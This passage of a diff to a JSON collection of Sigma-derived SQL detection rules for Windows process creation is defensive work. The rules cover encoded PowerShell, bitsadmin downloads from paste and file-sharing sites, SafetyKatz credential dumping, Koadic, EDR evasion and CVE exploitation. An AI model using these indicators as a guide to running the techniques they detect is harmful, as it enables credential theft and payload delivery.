(Citation: Symantec Living off the Land)\n", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "falsepositives": [ + "Legitimate use" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + ], + "filename": "proc_creation_win_remote_access_tools_logmein.yml" + }, + { + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "title": "Suspicious Encoded 
PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": 
"proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential 
CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "Powershell Inline Execution From A File", + "id": 
"ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], - "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + 
"falsepositives": [ + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", - "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR 
OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.collection", + "attack.t1560.001" + ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 
'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", - "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Legitimate import of keys" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR 
OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
